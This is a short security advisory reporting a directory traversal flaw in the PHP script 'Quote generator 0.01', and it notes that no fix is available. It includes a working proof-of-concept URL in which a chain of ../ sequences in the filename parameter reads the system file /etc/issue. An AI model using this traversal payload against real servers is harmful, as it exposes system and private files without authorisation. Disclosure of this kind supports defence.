COMMAND

    Quote generator

SYSTEMS AFFECTED

    Quote generator 0.01

PROBLEM

    Cabezon  Aurélien  found  following.   Quote  generator  0.01 (php
    script) by eric personn is vulnerable to the ../..  bug try this:

        www.yourhost.com/quote.html?filename=../../../../../../../../../../../../../../../../etc/issue&path_to_font_file=ariali.ttf

    It gives you the content of /etc/issue file.

SOLUTION

    Nothing yet.